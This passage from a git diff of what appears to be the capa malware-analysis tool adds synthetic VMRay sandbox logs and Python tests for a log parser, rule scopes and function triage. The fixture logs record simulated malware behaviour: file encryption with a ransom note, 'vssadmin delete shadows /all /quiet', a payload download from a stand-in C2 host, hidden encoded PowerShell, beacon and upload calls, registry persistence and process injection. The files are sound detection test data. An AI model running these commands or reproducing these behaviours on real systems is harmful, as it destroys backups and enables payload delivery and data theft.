dwCreationDisposition=3, dwFlagsAndAttributes=128, hTemplateFile=NULL) returned 0x55 + [0002.001] ReadFile (hFile=0x55, 
lpBuffer=0x10000, nNumberOfBytesToRead=4096, lpNumberOfBytesRead=0x11000, lpOverlapped=NULL) returned 1 + [0002.002] CryptEncrypt (hKey=0x3000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10000, pdwDataLen=0x12000, dwBufLen=4096) returned 1 + [0002.003] WriteFile (hFile=0x55, lpBuffer=0x10000, nNumberOfBytesToWrite=4096, lpNumberOfBytesWritten=0x13000, lpOverlapped=NULL) returned 1 + [0002.004] MoveFileExW (lpExistingFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx", lpNewFileName="C:\\Users\\victim\\Documents\\spreadsheet.xlsx.locked", dwFlags=1) returned 1 + [0002.005] FindFirstFileW (lpFileName="C:\\Users\\victim\\*", lpFindFileData=0x14000) returned 0x56 + [0002.006] FindNextFileW (hFindFile=0x56, lpFindFileData=0x14000) returned 1 + [0002.007] CreateFileW (lpFileName="C:\\Users\\victim\\README_DECRYPT.txt", dwDesiredAccess=1073741824, dwShareMode=0, lpSecurityAttributes=NULL, dwCreationDisposition=2, dwFlagsAndAttributes=128, hTemplateFile=NULL) returned 0x57 + [0002.008] WriteFile (hFile=0x57, lpBuffer=0x15000, nNumberOfBytesToWrite=512, lpNumberOfBytesWritten=0x16000, lpOverlapped=NULL) returned 1 + +Process: +id = "0002" +os_pid = "0x00000BCE" +os_parent_pid = "0x00000ABC" +parent_id = "0001" +image_name = "vssadmin.exe" +filename = "c:\\windows\\system32\\vssadmin.exe" +cmd_line = "vssadmin.exe delete shadows /all /quiet" +monitor_reason = "child_process" + +Region: +id = "0020" +name = "private_0x0000000000020000" + +Thread: +id = "0003" +os_tid = "0x00002C00" + [0003.000] NtQuerySystemInformation (SystemInformationClass=0x5, SystemInformation=0x20000, SystemInformationLength=0x1000, ReturnLength=0x21000) returned 0x0 + [0003.001] OpenProcess (dwDesiredAccess=0x1F0FFF, bInheritHandle=0, dwProcessId=2748) returned 0x58 + [0003.002] VssDeleteSnapshots (pwszObjectName=NULL, eSourceObjectType=0x0, bForceDelete=TRUE) returned 0x80042302 diff --git a/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt 
b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt new file mode 100644 index 0000000000..0b9455cc65 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt @@ -0,0 +1,43 @@ +# Log Creation Date: 02.01.2025 12:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x1234" +os_parent_pid = "0x1" +parent_id = "0" +image_name = "backdoor" +filename = "/tmp/backdoor" +cmd_line = "/tmp/backdoor" +monitor_reason = "analysis_target" + +Region: +id = "1" +name = "stack" + +Thread: +id = "1" +os_tid = "0x1234" + [0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100 + [0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6 + [0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3 + [0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4 + [0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0 + [0001.006] sys_fork () returned 0x2345 + [0001.007] sys_getuid () returned 0x0 + [0001.008] sys_setuid (uid=0x0) returned 0x0 + [0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0 + [0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0 + [0001.011] sys_time (tloc=0x0) returned 0x677f2000 + [0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0 + [0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0 + [0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000 + [0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0 + [0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0 + [0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0 + [0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0 + [0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, 
addrlen=0x7ffe2020) returned 0x5 + [0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20 + [0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40 diff --git a/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt new file mode 100644 index 0000000000..0948939b00 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt @@ -0,0 +1,37 @@ +# Log Creation Date: 03.01.2025 08:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x2000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "edgecase.exe" +filename = "c:\\users\\test\\edgecase.exe" +cmd_line = "edgecase.exe" +monitor_reason = "analysis_target" + +Region: +id = "5" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x2100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8 + [0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9 + [0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff + [0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0 + [0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1 + [0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1 + [0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0 + [0001.009] 
CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1 + [0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0 + [0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256 + [0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128 + [0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1 + [0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1 + [0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200 diff --git a/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt new file mode 100644 index 0000000000..e7cab248a9 --- /dev/null +++ b/tests/fixtures/vmray/flog_txt/windows_apis.flog.txt @@ -0,0 +1,63 @@ +# Log Creation Date: 01.01.2025 10:00:00 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x1000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "sample.exe" +filename = "c:\\users\\test\\desktop\\sample.exe" +cmd_line = "\"c:\\users\\test\\desktop\\sample.exe\" " +monitor_reason = "analysis_target" + +Region: +id = "10" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x1100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\Users\\test\\Documents\\config.ini", dwDesiredAccess=0x80000000, dwShareMode=0x1) returned 0x4 + [0001.002] RegOpenKeyExW (hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 10.0)", dwAccessType=0x1, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0x0) returned 
0x4c9804 + [0001.004] InternetConnectW (hInternet=0x4c9804, lpszServerName="evil.example.com", nServerPort=0x1bb, lpszUserName=NULL, lpszPassword=NULL, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0x4c9808 + [0001.005] VirtualAlloc (lpAddress=0x0, dwSize=4096, flAllocationType=0x3000, flProtect=0x40) returned 0x1000000 + [0001.006] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0x1, lpName="Global\\MyMutex12345") returned 0x100 + [0001.007] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7fff00000000 + [0001.008] CreateProcessW (lpApplicationName=NULL, lpCommandLine="cmd.exe /c whoami", dwCreationFlags=0x8) returned 0x1 + [0001.009] WriteFile (hFile=0x4, lpBuffer="MZ\x90\x00\x03", nNumberOfBytesToWrite=0x1000) returned 0x1 + [0001.010] HttpOpenRequestW (hConnect=0x4c9808, lpszVerb="GET", lpszObjectName="/beacon", lpszVersion=NULL, lpszReferrer=NULL, dwFlags=0x84403100) returned 0x4c980c + [0001.011] SetFileAttributesW (lpFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", dwFileAttributes=0x2) returned 0x1 + [0001.012] GetTempPathW (nBufferLength=0x104, lpBuffer="C:\\Users\\test\\AppData\\Local\\Temp\\") returned 0x23 + [0001.013] CopyFileW (lpExistingFileName="C:\\Users\\test\\Desktop\\sample.exe", lpNewFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", bFailIfExists=0x0) returned 0x1 + [0001.014] GetSystemDirectoryW (lpBuffer="C:\\Windows\\system32", uSize=0x104) returned 0x13 + [0001.015] ShellExecuteW (hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", lpParameters=NULL) returned 0x2a + [0002.000] WinHttpOpen (pszAgentW="WinHTTP/1.0", dwAccessType=0x0, pwszProxyW=NULL, pwszProxyBypassW=NULL, dwFlags=0x0) returned 0x4c9900 + [0002.001] WinHttpConnect (hSession=0x4c9900, pswzServerName="c2.example.org", nServerPort=0x50) returned 0x4c9904 + [0002.002] WinHttpOpenRequest (hConnect=0x4c9904, pwszVerb="POST", pwszObjectName="/upload", pwszVersion=NULL, pwszReferrer=NULL, dwFlags=0x0) returned 
0x4c9908 + [0002.003] RegSetValueExW (hKey=0x80000001, lpValueName="Persistence", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe") returned 0x0 + [0002.004] GetAddrInfoW (pNodeName="c2.example.org", pServiceName=NULL, pHints=0x0) returned 0x0 + +Process: +id = "2" +os_pid = "0x1200" +os_parent_pid = "0x1000" +parent_id = "1" +image_name = "cmd.exe" +filename = "c:\\windows\\system32\\cmd.exe" +cmd_line = "cmd.exe /c whoami" +monitor_reason = "child_process" + +Region: +id = "20" +name = "private_0x0000000000020000" + +Thread: +id = "3" +os_tid = "0x1300" + [0003.000] NtQueryInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x13fb10, ProcessInformationLength=0x18) returned 0x0 + [0003.001] GetComputerNameW (lpBuffer="DESKTOP-TEST01", nSize=0xf) returned 0x1 + [0003.002] GetUserNameW (lpBuffer="test", nSize=0x5) returned 0x1 diff --git a/tests/test_capabilities.py b/tests/test_capabilities.py index 809173da22..df44b9a45e 100644 --- a/tests/test_capabilities.py +++ b/tests/test_capabilities.py @@ -346,3 +346,28 @@ def test_instruction_subscope(z9324d_extractor): capabilities = capa.capabilities.common.find_capabilities(rules, z9324d_extractor) assert "push 1000 on i386" in capabilities.matches assert 0x406F60 in {result[0] for result in capabilities.matches["push 1000 on i386"]} + + +def test_connected_blocks_subscope(z9324d_extractor): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected block helper + scopes: + static: function + dynamic: process + features: + - connected blocks: + - and: + - api: kernel32.TerminateThread + """ + ) + ) + ] + ) + capabilities = capa.capabilities.common.find_capabilities(rules, z9324d_extractor) + assert "connected block helper" in capabilities.matches diff --git a/tests/test_connected_blocks.py b/tests/test_connected_blocks.py new file mode 100644 index 0000000000..4419c13fa0 
--- /dev/null +++ b/tests/test_connected_blocks.py @@ -0,0 +1,158 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import textwrap + +import capa.rules +from capa.features.insn import API +from capa.features.address import AbsoluteVirtualAddress +from capa.features.extractors.null import ( + FunctionFeatures, + BasicBlockFeatures, + InstructionFeatures, + NullStaticFeatureExtractor, +) +from capa.features.extractors.base_extractor import BBHandle, SampleHashes +from capa.capabilities.common import find_capabilities + + +class GraphNullStaticExtractor(NullStaticFeatureExtractor): + def __init__(self, *args, edges=None, **kwargs): + super().__init__(*args, **kwargs) + self._edges = edges or {} + + def get_cfg_edges(self, f, bb): + for succ in self._edges.get(int(f.address), {}).get(int(bb.address), []): + yield BBHandle(AbsoluteVirtualAddress(succ), None) + + +def make_graph_extractor(): + fva = AbsoluteVirtualAddress(0x401000) + b0 = AbsoluteVirtualAddress(0x401000) + b1 = AbsoluteVirtualAddress(0x401100) + b2 = AbsoluteVirtualAddress(0x401200) + b3 = AbsoluteVirtualAddress(0x401300) + b4 = AbsoluteVirtualAddress(0x401400) + b5 = AbsoluteVirtualAddress(0x401500) + + return GraphNullStaticExtractor( + base_address=AbsoluteVirtualAddress(0x400000), + sample_hashes=SampleHashes(md5="", sha1="", sha256=""), + global_features=[], + file_features=[], + functions={ + fva: FunctionFeatures( + features=[], + basic_blocks={ + b0: 
BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401001): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401001), API("CreateFileA"))] + ) + }, + ), + b1: BasicBlockFeatures(features=[], instructions={}), + b2: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401201): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401201), API("WriteFile"))] + ) + }, + ), + b3: BasicBlockFeatures( + features=[], + instructions={}, + ), + b4: BasicBlockFeatures( + features=[], + instructions={}, + ), + b5: BasicBlockFeatures( + features=[], + instructions={ + AbsoluteVirtualAddress(0x401501): InstructionFeatures( + features=[(AbsoluteVirtualAddress(0x401501), API("CloseHandle"))] + ) + }, + ), + }, + ) + }, + edges={ + int(fva): { + int(b0): [int(b1)], + int(b1): [int(b2)], + int(b2): [int(b3)], + int(b3): [int(b4)], + int(b4): [int(b5)], + } + }, + ) + + +def test_connected_blocks_depth2_match(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected blocks depth2 + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - api: CreateFileA + - api: WriteFile + """ + ) + ), + ] + ) + capabilities = find_capabilities(rules, make_graph_extractor()) + assert "connected blocks depth2" in capabilities.matches + assert AbsoluteVirtualAddress(0x401000) in {m[0] for m in capabilities.matches["connected blocks depth2"]} + + +def test_connected_blocks_too_far_no_match(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: connected blocks too far + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - api: CreateFileA + - api: CloseHandle + """ + ) + ), + ] + ) + capabilities = find_capabilities(rules, make_graph_extractor()) + assert "connected blocks too far" not in capabilities.matches diff 
--git a/tests/test_proto.py b/tests/test_proto.py index b0dc106040..8ce69bac19 100644 --- a/tests/test_proto.py +++ b/tests/test_proto.py @@ -125,6 +125,7 @@ def test_addr_to_pb2(): def test_scope_to_pb2(): assert capa.render.proto.scope_to_pb2(capa.rules.Scope.FILE) == capa_pb2.SCOPE_FILE assert capa.render.proto.scope_to_pb2(capa.rules.Scope.FUNCTION) == capa_pb2.SCOPE_FUNCTION + assert capa.render.proto.scope_to_pb2(capa.rules.Scope.CONNECTED_BLOCKS) == capa_pb2.SCOPE_BASIC_BLOCK assert capa.render.proto.scope_to_pb2(capa.rules.Scope.BASIC_BLOCK) == capa_pb2.SCOPE_BASIC_BLOCK assert capa.render.proto.scope_to_pb2(capa.rules.Scope.INSTRUCTION) == capa_pb2.SCOPE_INSTRUCTION assert capa.render.proto.scope_to_pb2(capa.rules.Scope.PROCESS) == capa_pb2.SCOPE_PROCESS @@ -313,6 +314,17 @@ def assert_feature(fa, fb): elif isinstance(fa, capa.features.freeze.features.APIFeature): assert fa.api == fb.api + elif isinstance(fa, capa.features.freeze.features.ArgumentStringFeature): + assert fa.name == fb.name + assert fa.argument_string == fb.argument_string + + elif isinstance(fa, capa.features.freeze.features.ArgumentNumberFeature): + assert fa.name == fb.name + assert fa.argument_number == getattr(fb.argument_number, fb.argument_number.WhichOneof("value")) + + elif isinstance(fa, capa.features.freeze.features.ReturnValueFeature): + assert fa.return_value == getattr(fb.return_value, fb.return_value.WhichOneof("value")) + elif isinstance(fa, capa.features.freeze.features.PropertyFeature): assert fa.property == fb.property_ assert fa.access == fb.access diff --git a/tests/test_rules_insn_scope.py b/tests/test_rules_insn_scope.py index 86ebcd35b2..7402bb689e 100644 --- a/tests/test_rules_insn_scope.py +++ b/tests/test_rules_insn_scope.py @@ -131,6 +131,42 @@ def test_scope_instruction_description(): ) ) + +def test_rule_subscope_connected_blocks(): + rules = capa.rules.RuleSet( + [ + capa.rules.Rule.from_yaml( + textwrap.dedent( + """ + rule: + meta: + name: test connected 
blocks subscope + scopes: + static: function + dynamic: process + features: + - and: + - connected blocks: + - and: + - mnemonic: mov + - arch: i386 + """ + ) + ) + ] + ) + + # parent function scope rule + derived connected-blocks subscope rule. + assert len(rules.function_rules) == 1 + assert len(rules.connected_block_rules) == 1 + + +def test_scope_connected_blocks_ordering(): + assert capa.rules.is_subscope_compatible(capa.rules.Scope.FUNCTION, capa.rules.Scope.CONNECTED_BLOCKS) + assert capa.rules.is_subscope_compatible(capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.BASIC_BLOCK) + assert capa.rules.is_subscope_compatible(capa.rules.Scope.CONNECTED_BLOCKS, capa.rules.Scope.INSTRUCTION) + assert not capa.rules.is_subscope_compatible(capa.rules.Scope.BASIC_BLOCK, capa.rules.Scope.CONNECTED_BLOCKS) + capa.rules.Rule.from_yaml( textwrap.dedent( """ diff --git a/tests/test_triage.py b/tests/test_triage.py new file mode 100644 index 0000000000..57a783f492 --- /dev/null +++ b/tests/test_triage.py @@ -0,0 +1,145 @@ +# Copyright 2026 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from capa.features.insn import API +from capa.features.address import AbsoluteVirtualAddress +from capa.capabilities.triage import ( + REASON_CRT_NAME, + REASON_LARGE_COMPLEXITY, + REASON_TINY_NO_API, + TriageDecision, + classify_function, +) +from capa.features.extractors.base_extractor import BBHandle, InsnHandle, FunctionHandle, SampleHashes, StaticFeatureExtractor + + +class FakeInsn: + def __init__(self, mnem: str = "nop"): + self.mnem = mnem + + +class FakeFunction: + section_name = ".text" + + +class FakeTriageExtractor(StaticFeatureExtractor): + def __init__(self, names=None, function_data=None): + super().__init__(SampleHashes(md5="", sha1="", sha256="")) + self.names = names or {} + self.function_data = function_data or {} + + def get_base_address(self): + return AbsoluteVirtualAddress(0x0) + + def extract_global_features(self): + yield from () + + def extract_file_features(self): + yield from () + + def get_functions(self): + for fva in sorted(self.function_data): + yield FunctionHandle(AbsoluteVirtualAddress(fva), FakeFunction()) + + def get_function_name(self, addr): + if int(addr) not in self.names: + raise KeyError(addr) + return self.names[int(addr)] + + def extract_function_features(self, f): + yield from () + + def get_basic_blocks(self, f): + for bva in sorted(self.function_data[int(f.address)]["bbs"]): + yield BBHandle(AbsoluteVirtualAddress(bva), None) + + def extract_basic_block_features(self, f, bb): + yield from () + + def get_instructions(self, f, bb): + for iva, mnem in self.function_data[int(f.address)]["bbs"][int(bb.address)]: + yield InsnHandle(AbsoluteVirtualAddress(iva), FakeInsn(mnem)) + + def extract_insn_features(self, f, bb, insn): + for feature in self.function_data[int(f.address)].get("insn_features", {}).get(int(insn.address), ()): + yield feature, insn.address + + +def test_triage_classify_crt_name_skip(): + extractor = FakeTriageExtractor( + names={0x401000: "__security_init_cookie"}, + function_data={0x401000: {"bbs": 
{0x401000: [(0x401000, "ret")]}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x401000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.SKIP + assert result.reason == REASON_CRT_NAME + + +def test_triage_classify_tiny_no_api_skip(): + extractor = FakeTriageExtractor( + names={0x402000: "sub_402000"}, + function_data={0x402000: {"bbs": {0x402000: [(0x402000, "nop"), (0x402001, "nop")]}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x402000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.SKIP + assert result.reason == REASON_TINY_NO_API + + +def test_triage_classify_large_function_deprioritize(): + insns = [(0x500000 + i, "nop") for i in range(4096)] + extractor = FakeTriageExtractor( + names={0x500000: "sub_500000"}, + function_data={0x500000: {"bbs": {0x500000: insns}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x500000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.DEPRIORITIZE + assert result.reason == REASON_LARGE_COMPLEXITY + + +def test_triage_api_presence_prevents_tiny_skip(): + extractor = FakeTriageExtractor( + names={0x403000: "sub_403000"}, + function_data={ + 0x403000: { + "bbs": {0x403000: [(0x403000, "call"), (0x403001, "ret")]}, + "insn_features": {0x403000: [API("kernel32.CreateFileA")]}, + } + }, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x403000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.ANALYZE + + +def test_triage_api_feature_evidence_prevents_thunk_skip(): + extractor = FakeTriageExtractor( + names={0x404000: "sub_404000"}, + function_data={ + 0x404000: { + "bbs": {0x404000: [(0x404000, "jmp")]}, + "insn_features": {0x404000: [API("kernel32.CreateFileA")]}, + } + }, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x404000), FakeFunction()) + + result = classify_function(extractor, 
fh) + assert result.decision == TriageDecision.ANALYZE diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py new file mode 100644 index 0000000000..9937703cce --- /dev/null +++ b/tests/test_vmray_flog_txt.py @@ -0,0 +1,798 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +"""Tests for VMRay flog.txt parser (#2452).""" + +from pathlib import Path + +import pytest + +import capa.features.insn +import capa.features.common +from capa.exceptions import UnsupportedFormatError +from capa.features.extractors.vmray import flog_txt +from capa.features.extractors.vmray.flog_txt import _parse_args, _parse_event, _parse_hex_or_decimal +from capa.features.extractors.vmray.extractor import VMRayExtractor + +# Fixture files live in tests/fixtures/vmray/flog_txt/ (committed to the main repo so they +# are always present in CI without requiring the capa-testfiles submodule). 
# Directory holding the realistic flog.txt fixture files used by the
# fixture-based regression tests below.
FLOG_TXT_FIXTURES = Path(__file__).resolve().parent / "fixtures" / "vmray" / "flog_txt"


# A minimal but realistic flog.txt document: one Process block, one Region
# block (which the parser should tolerate), and one Thread block with three
# API-call event lines.  Note the quadruple backslashes: this is a non-raw
# Python string, so the file content carries double backslashes, matching
# VMRay's escaping in real flog.txt output.
MINIMAL_FLOG_TXT = """
# Log Creation Date: 08.10.2024 18:12:03
# Analyzer Version: 2024.4.1
# Flog Txt Version 1

Process:
id = "1"
os_pid = "0x118c"
os_parent_pid = "0x7d8"
parent_id = "0"
image_name = "svchost.exe"
filename = "c:\\\\users\\\\test\\\\desktop\\\\svchost.exe"
cmd_line = "\\"c:\\\\users\\\\test\\\\desktop\\\\svchost.exe\\" "
monitor_reason = "analysis_target"

Region:
id = "125"
name = "private_0x0000000000010000"

Thread:
id = "1"
os_tid = "0x117c"
 [0072.750] GetCurrentProcess () returned 0xffffffffffffffff
 [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc
 [0066.433] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
"""


def test_parse_flog_txt_minimal(tmp_path):
    """A minimal hand-built flog.txt parses into one process, one thread, one call."""
    # Write as binary so newlines are exactly \n (avoids Windows \r\n)
    path = tmp_path / "flog.txt"
    path.write_bytes(
        b"# Flog Txt Version 1\n\n"
        b"Process:\n"
        b'id = "1"\n'
        b'os_pid = "0x118c"\n'
        b'image_name = "svchost.exe"\n'
        b'filename = "test.exe"\n'
        b'monitor_reason = "analysis_target"\n'
        b'parent_id = "0"\n'
        b'os_parent_pid = "0"\n'
        b'cmd_line = ""\n\n'
        b"Thread:\n"
        b'id = "1"\n'
        b'os_tid = "0x117c"\n'
        b" [0072.750] GetCurrentProcess () returned 0xffffffffffffffff\n"
    )
    flog = flog_txt.parse_flog_txt_path(path)
    assert flog.analysis.log_version == "1"
    assert len(flog.analysis.monitor_processes) == 1
    proc = flog.analysis.monitor_processes[0]
    assert proc.image_name == "svchost.exe"
    assert proc.process_id == 1
    assert proc.os_pid == 0x118C
    assert len(flog.analysis.monitor_threads) == 1
    thread = flog.analysis.monitor_threads[0]
    assert thread.thread_id == 1
    assert thread.process_id == 1
    assert len(flog.analysis.function_calls) == 1
    assert flog.analysis.function_calls[0].name == "GetCurrentProcess"


def test_parse_flog_txt_rejects_wrong_header():
    """Input without the '# Flog Txt Version' header raises UnsupportedFormatError."""
    with pytest.raises(UnsupportedFormatError, match="does not appear to be a VMRay flog.txt"):
        flog_txt.parse_flog_txt("not a flog\nProcess:\nid = 1\n")


def test_parse_flog_txt_sys_prefix_stripped(tmp_path):
    # Linux kernel calls start with sys_; parser should strip for consistency with XML
    path = tmp_path / "flog.txt"
    path.write_bytes(
        b"# Flog Txt Version 1\n\n"
        b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n'
        b'image_name = "sample"\nfilename = "x"\ncmd_line = ""\nmonitor_reason = "a"\n\n'
        b'Thread:\nid = "1"\nos_tid = "0x2000"\n [0001.000] sys_time () returned 0x0\n'
    )
    flog = flog_txt.parse_flog_txt_path(path)
    assert len(flog.analysis.function_calls) == 1
    assert flog.analysis.function_calls[0].name == "time"


def test_vmray_analysis_from_flog_txt(tmp_path):
    """VMRayAnalysis.from_flog_txt builds an analysis with flog.txt-specific defaults."""
    path = tmp_path / "flog.txt"
    # normalize any \r\n / \r to \n so the parser sees exactly the intended lines
    path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n"))
    from capa.features.extractors.vmray import VMRayAnalysis

    analysis = VMRayAnalysis.from_flog_txt(path)
    assert analysis.submission_name == "flog.txt"
    assert analysis.submission_type == "unknown"
    assert analysis.submission_meta is not None
    assert analysis.submission_static is None
    assert len(analysis.monitor_processes) == 1
    assert len(analysis.monitor_process_calls) >= 1


def test_vmray_extractor_from_flog_txt(tmp_path):
    """VMRayExtractor.from_flog_txt yields processes, threads and calls from MINIMAL_FLOG_TXT."""
    from capa.features.address import NO_ADDRESS

    path = tmp_path / "flog.txt"
    path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n"))
    ext = VMRayExtractor.from_flog_txt(path)
    assert ext.get_base_address() is NO_ADDRESS  # no base address from flog.txt
    procs = list(ext.get_processes())
    assert len(procs) == 1
    threads = list(ext.get_threads(procs[0]))
    assert len(threads) == 1
    calls = list(ext.get_calls(procs[0], threads[0]))
    assert len(calls) == 3


def test_parse_flog_txt_args_parsed(tmp_path):
    """API call arguments are parsed into Param objects for feature extraction."""
